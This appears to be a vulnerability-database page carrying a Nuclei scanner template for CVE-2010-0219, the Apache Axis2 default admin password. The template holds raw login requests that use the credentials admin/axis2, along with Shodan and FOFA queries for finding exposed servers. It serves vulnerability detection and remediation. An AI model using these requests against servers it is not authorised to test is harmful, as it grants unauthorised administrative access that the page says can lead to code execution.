nuclei ProjectDiscovery NUCLEI:CVE-2010-0219
History: Feb 26, 2021 - 8:03 p.m.

Apache Axis2 Default Login

2021-02-26 20:03:32
ProjectDiscovery
github.com
cve
axis2
apache
default login
vulnerability
remote code execution

CVSS2: 10
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score: 7.9
Confidence: High

EPSS: 0.975
Percentile: 100.0%

Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.

id: CVE-2010-0219

info:
  name: Apache Axis2 Default Login
  author: pikpikcu
  severity: critical
  description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data.
  remediation: |
    Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0219
    - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
    - http://www.rapid7.com/security-center/advisories/R7-0037.jsp
    - http://www.vupen.com/english/advisories/2010/2673
    - http://retrogod.altervista.org/9sg_ca_d2d.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2010-0219
    cwe-id: CWE-255
    epss-score: 0.97509
    epss-percentile: 0.99984
    cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: axis2
    shodan-query:
      - http.html:"Apache Axis"
      - http.html:"apache axis"
    fofa-query: body="apache axis"
  tags: cve,cve2010,axis,apache,default-login,axis2

http:
  - raw:
      - |
        POST /axis2-admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginUsername={{username}}&loginPassword={{password}}
      - |
        POST /axis2/axis2-admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName={{username}}&password={{password}}&submit=+Login+

    payloads:
      username:
        - admin
      password:
        - axis2
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<h1>Welcome to Axis2 Web Admin Module !!</h1>"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b202ff112ac09598ca6e373881d17b8a249a5398bf3a267b590ef948c91b8df2022015efa111b4715764807e6ae1c1516711d3d38d0a73835b1bbda2b1b7cf910854:922c64590222798bb761d5b6d8e72950
